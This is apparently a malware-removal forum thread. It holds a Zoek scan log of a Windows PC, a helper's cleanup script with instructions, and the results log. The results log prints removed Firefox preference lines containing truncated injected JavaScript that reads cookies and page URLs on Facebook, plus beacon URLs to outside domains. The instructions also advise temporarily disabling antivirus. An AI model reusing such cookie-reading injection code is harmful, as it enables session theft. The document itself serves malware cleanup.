====== C: exe-files ==

2014-07-29 16:23:28 57CC12F075C4825E18107FF94C499B42 30160144 ----a-w- C:\ProgramData\NVIDIA Corporation\NetService\b87f45da-55d3-44e2-a85f-06a00ee66cda\GeForce_Experience_Update_v2.1.1.0.exe

2014-07-29 16:23:27 135B3E6D46D4A9B5384BA1CC501C2525 339872 ----a-w- C:\Users\Owner\AppData\Local\NVIDIA\NvBackend\Packages\00005e18\streaming-assets-need_for_speed_hot_pursuit.18735651.exe

2014-07-29 16:23:23 7275A3A5995C1DDBCF2441E5DDB59428 3795984 ----a-w- C:\Users\Owner\AppData\Local\NVIDIA\NvBackend\Packages\00005e37\DAO.18736091.exe

2014-07-28 16:22:51 B75CB32A17945081C64C1ED8A6B54A44 393672 ----a-w- C:\Users\Owner\AppData\Local\NVIDIA\NvBackend\Packages\00005d99\updatus.18732029_RUNASUSER.exe

2014-07-27 07:06:28 11FD8DDAB6014EECCE88F1F581604C30 1120256 ----a-w- C:\Windows\System32\SkyDrive.exe

2014-07-25 16:20:38 0B7094462A70E630ECAA8E1DEE603988 3769784 ----a-w- C:\Users\Owner\AppData\Local\NVIDIA\NvBackend\Packages\00005d8b\DAO.18726867.exe

2014-07-24 16:18:57 84B27D2B862C24CCDDA27DFFFD6E580F 393560 ----a-w- C:\Users\Owner\AppData\Local\NVIDIA\NvBackend\Packages\00005d84\updatus.18722395_RUNASUSER.exe

2014-07-24 01:37:41 82201563BC06E78EC4F713DA439EC257 560640 ----a-w- C:\Program Files (x86)\Steam\SteamApps\common\Dragon's Lair\DragonsLair.exe

2014-07-23 16:17:59 A29D17CDEB67522D6822C45153EB79B3 3766008 ----a-w- C:\Users\Owner\AppData\Local\NVIDIA\NvBackend\Packages\00005d75\DAO.18716353.exe

2014-07-23 16:17:57 38B68BC6D0B5CE3937FF36A47B402F6F 393048 ----a-w- C:\Users\Owner\AppData\Local\NVIDIA\NvBackend\Packages\00005d73\updatus.18718861_RUNASUSER.exe

=== C: other files ==

 

==== Startup Registry Enabled ======================

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"ASUS AiChargerPlus Execute"="C:\Program Files (x86)\InstallShield Installation Information\{E6931688-DA2B-4E16-8539-3D323D69C677}\AiChargerPlus.exe"

"ASUSWebStorage"="C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\AsusWSPanel.exe /S"

"ASUSPRP"="C:\Program Files (x86)\ASUS\APRP\APRP.EXE"

"StartCCC"="C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe MSRun"

"RemoteControl10"="C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe"

"WRSVC"="C:\Program Files (x86)\Webroot\WRSA.exe -ul"

"Adobe ARM"="C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"

"iSkysoft Helper Compact.exe"="C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe"

"DelaypluginInstall"="C:\ProgramData\iSkysoft\iTube Studio\DelayPluginI.exe"

"SunJavaUpdateSched"="C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

 

==== Startup Registry Enabled x64 ======================

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"lxecmon.exe"="C:\Program Files (x86)\Lexmark Pro800-Pro900 Series\lxecmon.exe"

"EzPrint"="C:\Program Files (x86)\Lexmark Pro800-Pro900 Series\ezprint.exe"

"NvBackend"="C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"

"ShadowPlay"="C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart"

"Classic Start Menu"="C:\Program Files\Classic Shell\ClassicStartMenu.exe -autorun"

"XboxStat"="C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe silentrun"

"RTHDVCPL"="C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe -s"

"RtHDVBg"="C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /MAXX4 "

"EvtMgr6"="C:\Program Files\Logitech\SetPointP\SetPoint.exe /launchGaming"

 

==== Startup Folders ======================

 

2014-03-11 20:12:58 10720 ----a-w- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DesktopOK.ini

2010-09-13 01:33:26 316416 ----a-w- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DesktopOK_x64.exe

2014-04-13 14:57:54 2129 ----a-w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass FF RunOnce.lnk

2014-04-13 14:57:54 2129 ----a-w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass IE RunOnce.lnk

2014-02-06 02:27:34 2211 ----a-w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install Webroot FF RunOnce.lnk

2014-02-06 02:27:33 2211 ----a-w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install Webroot IE RunOnce.lnk

2014-04-15 01:17:13 924 ----a-w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA3100 Genie.lnk

2014-02-08 23:48:29 1129 ----a-w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Secunia PSI Tray.lnk

 

==== Task Scheduler Jobs ======================

 

C:\WINDOWS\tasks\Adobe Flash Player Updater.job --a-------- C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [07/08/2014 11:29 AM]

C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job --a-------- C:\Program Files (x86)\Google\Update\GoogleUpdate.exe []

C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job --a-------- C:\Program Files (x86)\Google\Update\GoogleUpdate.exe []

 

==== Other Scheduled Tasks ======================

 

"C:\WINDOWS\SysNative\tasks\Adobe Flash Player Updater" [C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe]

"C:\WINDOWS\SysNative\tasks\AsusVibeSchedule" ["C:\Program Files (x86)\Asus\AsusVibe\AsusVibeLauncher.exe"]

"C:\WINDOWS\SysNative\tasks\CCleanerSkipUAC" ["C:\Program Files\CCleaner\CCleaner.exe"]

"C:\WINDOWS\SysNative\tasks\GoogleUpdateTaskMachineCore" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]

"C:\WINDOWS\SysNative\tasks\GoogleUpdateTaskMachineUA" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]

"C:\WINDOWS\SysNative\tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-610162119-960651099-2309175161-1001" [C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe]

"C:\WINDOWS\SysNative\tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-610162119-960651099-2309175161-1001" [C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe]

"C:\WINDOWS\SysNative\tasks\ASUS\ASUS AI Suite II Execute" [C:\Program Files (x86)\ASUS\AI Suite II\AsRoutineController.exe]

"C:\WINDOWS\SysNative\tasks\ASUS\ASUS Easy Update 2" [C:\Program Files (x86)\ASUS\ASUS Easy Update\ALU.exe]

 

==== Firefox Extensions Registry ======================

 

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Mozilla\Firefox\Extensions]

"{F003DA68-8256-4b37-A6C4-350FA04494DF}"="C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt" [07/17/2014 11:31 AM]

 

==== Firefox Extensions ======================

 

ProfilePath: C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\kfjgpmg8.default

- Webroot Filtering Extension - C:\ProgramData\WRData\PKG\FIREFOX\WebrootSecure_SocketServer

- Logitech SetPoint - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt

- Ant Video Downloader - %ProfilePath%\extensions\anttoolbar@ant.com

- LastPass - %ProfilePath%\extensions\support@lastpass.com

- DownloadHelper - %ProfilePath%\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}

- Video Downloader Professional - %ProfilePath%\extensions\ffext_basicvideoext@startpage24.xpi

- TinEye Reverse Image Search - %ProfilePath%\extensions\tineye@ideeinc.com.xpi

- AVG PrivacyFix - %ProfilePath%\extensions\{7CA9CF31-1C73-46CD-8377-85AB71EA771F}.xpi

- Adblock Plus - %ProfilePath%\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi

 

AppDir: C:\Program Files (x86)\Mozilla Firefox

- Default - %AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

 

==== Firefox Plugins ======================

 

Profilepath: C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\kfjgpmg8.default

4390CCD3790F8D9C427C0C29590C62D7 - C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll - Shockwave Flash

18CF51689186AEB9D1D149AEB0E92D03 - C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL - Microsoft Office 2013

 

 

==== Chrome Look ======================

 

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions

bhicbhhgmeobmgjehpcecbkjpehljipn - C:\ProgramData\iSkysoft\iTube Studio\ISAllmytube@iSkysoft.com.crx[]

bpegkgagfojjbcpkihigfmkojdmmimdf - C:\Program Files (x86)\Freemake\Freemake Video Downloader\BrowserPlugin\Chrome\Freemake.Plugin.Chrome.crx[]

ehgldbbpchgpcfagfpfjgoomddhccfgh - C:\Program Files (x86)\Freemake\Freemake Video Downloader\BrowserPlugin\Chrome\ChromeYoutubePlugin.crx[]

jbolfgndggfhhpbnkgnpjkfhinclbigj - No path found[]

kjeghcllfecehndceplomkocgfbklffd - C:\ProgramData\WRData\PKG\CHROME\CHROME_1.0.0.26.crx[02/05/2014 08:26 PM]

okfhiodnpcnnnpgbjbhfebjnbagmfhab - C:\ProgramData\WRData\pkg\lpchrome.crx[02/05/2014 08:27 PM]

 

PorIcEChop - Administrator\AppData\Local\Chromatic Browser\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Chromatic Browser\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Administrator\AppData\Local\Torch\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Torch\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Chromatic Browser\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Guest\AppData\Local\Chromatic Browser\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Torch\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Guest\AppData\Local\Torch\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Owner\AppData\Local\Chromatic Browser\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Owner\AppData\Local\Chromatic Browser\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Owner\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Owner\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

Google Voice Search Hotword (Beta) - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn

Last updated at time on date - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb

Lamborghini Sesto Elemento Theme - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\dappigdjllcnkkoacaoolciaolaaiemb

PartyCloud DJ - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\defekohaofmambflfpfoojkmfdpcbgko

Gmail Offline - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejidjjhkpiempkbhmpbfngldlkglhimk

Pandora - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\fbangkleohkafngihneedemihgfeikcl

Free Music Downloads - Mp3 Music - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\fgbljhhdencbpamajdkebnaaefgllghj

AdBlock - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom

TinEye Reverse Image Search - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\haebnnbpedcbhciplfhjjkbafijpncjl

LastPass - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd

SavuEMass - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

Webroot Filtering Extension - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjeghcllfecehndceplomkocgfbklffd

Until AM Web App - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\kodigjkcpaoeodlnmcnekemakpnmegnk

Google Wallet - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda

Webroot Password Manager - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\okfhiodnpcnnnpgbjbhfebjnbagmfhab

Gmail - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia

AVG PrivacyFix - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmejhjjecaldkllonlokhkglbdbkdcni

App Launcher Customizer for Googleâ„¢ - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ponjkmladgjfjgllmhnkhgbgocdigcjm

PorIcEChop - Owner\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Owner\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Owner\AppData\Local\Torch\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Owner\AppData\Local\Torch\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

 

==== IE Start and Search Settings ======================

 

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]

"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}] not found

 

==== C:\zoek_backup content ======================

 

C:\zoek_backup (files=0 folders=0 0 bytes)

 

==== EOF on Tue 07/29/2014 at 14:22:36.36 ======================

Link to post
Share on other sites

51a612a8b27e2-Zoek.png Scan with ZOEK

Temporary disable your AntiVirus and AntiSpyware protection - instructions here.

  • Right-click on 51a612a8b27e2-Zoek.png icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • Wait patiently until the main console will appear, it may take a minute or two.
  • In the main box please paste in the following script:
    createsrpoint;autoclean;emptyalltemp;C:\ProgramData\GreenBay App;fsC:\ProgramData\SavuEMass;fsC:\ProgramData\e646da9e30087882;fsbhicbhhgmeobmgjehpcecbkjpehljipn;chrapdkcimmhjninckhlbphakaiolngmjfj;chrjdjjicajhkckggokiccknagdncidjcee;chr

  • Make sure that Scan All Users option is checked.
  • Push Run Script and wait patiently. The scan may take a couple of minutes.
  • When the scan completes, a zoek-results logfile should open in notepad.
  • If a reboot is needed, it will be opened after it. You may also find it at your main drive (usually C:\ drive)



Post its content into your next reply.

Link to post
Share on other sites

 

Zoek.exe v5.0.0.0 Updated 29-07-2014

Tool run by Owner on Tue 07/29/2014 at 19:36:21.91.

Microsoft Windows 8.1 6.3.9600  x64

Running in: Normal Mode Internet Access Detected

Launched: C:\Users\Owner\Desktop\zoek.exe [scan all users] [script inserted] 

 

==== Older Logs ======================

 

C:\zoek-results2014-07-29-202236.log 34852 bytes

 

==== System Restore Info ======================

 

7/29/2014 7:36:43 PM Zoek.exe System Restore Point Created Succesfully.

 

==== Deleting CLSID Registry Keys ======================

 

 

==== Deleting CLSID Registry Values ======================

 

 

==== Deleting Services ======================

 

 

==== FireFox Fix ======================

 

ProfilePath: C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\kfjgpmg8.default

 

user.js not found

---- Lines easylife removed from prefs.js ----

user_pref("extensions.gpHtKO.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if

 

(url.indexOf(\"acebook\")>-1||url.indexO

user_pref("extensions.x9pj1QzJyQZs.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if

 

(url.indexOf(\"acebook\")>-1||url.

---- Lines extensions.gpHtKO removed from prefs.js ----

user_pref("extensions.gpHtKO.epoch", "1406354996");

user_pref("extensions.gpHtKO.url", "http://terminalukusaa.us/sync2/?

 

q=hfZ9ofqJC75MCyVUojsFrjwMg708BNmGWj8lkGhGheDUojw9rdCGrjsEqjY8rGhIC7n0rjnEqHs8rdgE

---- Lines extensions.x9pj1QzJyQZs removed from prefs.js ----

user_pref("extensions.x9pj1QzJyQZs.epoch", "1406354996");

user_pref("extensions.x9pj1QzJyQZs.url", "http://jpisyncs.info/sync2/?

 

q=hfZ9ofbTCyrMCyVUojsFrjwMg708BNmGWj8lkGhGheDUojw9rdCGrjsEqjUEpihIC7n0rjnEqHs8rd

---- FireFox user.js and prefs.js backups ---- 

 

prefs_20140729_0742_.backup

 

==== Deleting Files \ Folders ======================

 

C:\ProgramData\GreenBay App not found

C:\ProgramData\SavuEMass not found

C:\ProgramData\e646da9e30087882 not found

C:\Users\Owner\AppData\LocalLow\{26D46134-E7D9-B0E1-D3AC-35CE315423DC} deleted

C:\Users\Owner\AppData\LocalLow\{C9EAD628-4A64-6AB3-116E-04E63EF48DFE} deleted

C:\Users\Owner\AppData\Local\Packages\windows_ie_ac_001\AC\{26D46134-E7D9-B0E1-D3AC-35CE315423DC} deleted

C:\Users\Owner\AppData\Local\Packages\windows_ie_ac_001\AC\{C9EAD628-4A64-6AB3-116E-04E63EF48DFE} deleted

C:\PROGRA~3\SavuEMass deleted

C:\PROGRA~2\SavuEMass deleted

C:\PROGRA~2\Yahoo! deleted

C:\PROGRA~2\Orbitdownloader deleted

C:\Users\Owner\AppData\Roaming\MPUI.ini deleted

C:\Users\Owner\AppData\Roaming\Yahoo! deleted

C:\PROGRA~3\UpdaterLog.txt deleted

C:\PROGRA~3\Yahoo! deleted

C:\PROGRA~3\GreenBay App deleted

C:\PROGRA~3\InstallMate deleted

C:\PROGRA~3\Package Cache deleted

C:\Users\Owner\Searches deleted

C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\kfjgpmg8.default\jetpack deleted

"C:\PROGRA~3\e646da9e30087882\{B945F928-45A2-231E-495F-38C40CA198E9}.20140721150147" deleted

"C:\PROGRA~3\e646da9e30087882\{F7FFE175-E3D6-2E86-0226-1D3AE4905E40}.20140721150137" deleted

"C:\PROGRA~3\e646da9e30087882" deleted

"C:\Users\Owner\AppData\Roaming\GrabPro" deleted

"C:\Users\Owner\AppData\Roaming\Samsung" deleted

 

==== Firefox Extensions Registry ======================

 

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Mozilla\Firefox\Extensions]

"{F003DA68-8256-4b37-A6C4-350FA04494DF}"="C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt" [07/17/2014 11:31 AM]

 

==== Firefox Extensions ======================

 

ProfilePath: C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\kfjgpmg8.default

- Webroot Filtering Extension - C:\ProgramData\WRData\PKG\FIREFOX\WebrootSecure_SocketServer

- Logitech SetPoint - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt

- Ant Video Downloader - %ProfilePath%\extensions\anttoolbar@ant.com

- LastPass - %ProfilePath%\extensions\support@lastpass.com

- DownloadHelper - %ProfilePath%\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}

- Video Downloader Professional - %ProfilePath%\extensions\ffext_basicvideoext@startpage24.xpi

- TinEye Reverse Image Search - %ProfilePath%\extensions\tineye@ideeinc.com.xpi

- AVG PrivacyFix - %ProfilePath%\extensions\{7CA9CF31-1C73-46CD-8377-85AB71EA771F}.xpi

- Adblock Plus - %ProfilePath%\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi

 

AppDir: C:\Program Files (x86)\Mozilla Firefox

- Default - %AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

 

==== Firefox Plugins ======================

 

Profilepath: C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\kfjgpmg8.default

4390CCD3790F8D9C427C0C29590C62D7 - C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll - Shockwave Flash

18CF51689186AEB9D1D149AEB0E92D03 - C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL - Microsoft 

 

Office 2013

 

 

==== Chrome Look ======================

 

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions

bhicbhhgmeobmgjehpcecbkjpehljipn - C:\ProgramData\iSkysoft\iTube Studio\ISAllmytube@iSkysoft.com.crx[]

bpegkgagfojjbcpkihigfmkojdmmimdf - C:\Program Files (x86)\Freemake\Freemake Video Downloader\BrowserPlugin\Chrome

 

\Freemake.Plugin.Chrome.crx[]

ehgldbbpchgpcfagfpfjgoomddhccfgh - C:\Program Files (x86)\Freemake\Freemake Video Downloader\BrowserPlugin\Chrome

 

\ChromeYoutubePlugin.crx[]

jbolfgndggfhhpbnkgnpjkfhinclbigj - No path found[]

kjeghcllfecehndceplomkocgfbklffd - C:\ProgramData\WRData\PKG\CHROME\CHROME_1.0.0.26.crx[02/05/2014 08:26 PM]

okfhiodnpcnnnpgbjbhfebjnbagmfhab - C:\ProgramData\WRData\pkg\lpchrome.crx[02/05/2014 08:27 PM]

 

PorIcEChop - Administrator\AppData\Local\Chromatic Browser\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Chromatic Browser\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Administrator\AppData\Local\Torch\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Torch\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Chromatic Browser\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Guest\AppData\Local\Chromatic Browser\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Torch\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Guest\AppData\Local\Torch\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Owner\AppData\Local\Chromatic Browser\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Owner\AppData\Local\Chromatic Browser\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Owner\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Owner\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

Google Voice Search Hotword (Beta) - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions

 

\bepbmhgboaologfdajaanbcjmnhjmhfn

Last updated at time on date - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions

 

\cfhdojbkjhnklbpkdaibdccddilifddb

Lamborghini Sesto Elemento Theme - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions

 

\dappigdjllcnkkoacaoolciaolaaiemb

PartyCloud DJ - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\defekohaofmambflfpfoojkmfdpcbgko

Gmail Offline - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejidjjhkpiempkbhmpbfngldlkglhimk

Pandora - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\fbangkleohkafngihneedemihgfeikcl

Free Music Downloads - Mp3 Music - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions

 

\fgbljhhdencbpamajdkebnaaefgllghj

AdBlock - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom

TinEye Reverse Image Search - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions

 

\haebnnbpedcbhciplfhjjkbafijpncjl

LastPass - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd

SavuEMass - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

Webroot Filtering Extension - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions

 

\kjeghcllfecehndceplomkocgfbklffd

Until AM Web App - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\kodigjkcpaoeodlnmcnekemakpnmegnk

Google Wallet - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda

Webroot Password Manager - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions

 

\okfhiodnpcnnnpgbjbhfebjnbagmfhab

Gmail - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia

AVG PrivacyFix - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmejhjjecaldkllonlokhkglbdbkdcni

App Launcher Customizer for Googleâ„¢ - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions

 

\ponjkmladgjfjgllmhnkhgbgocdigcjm

PorIcEChop - Owner\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Owner\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

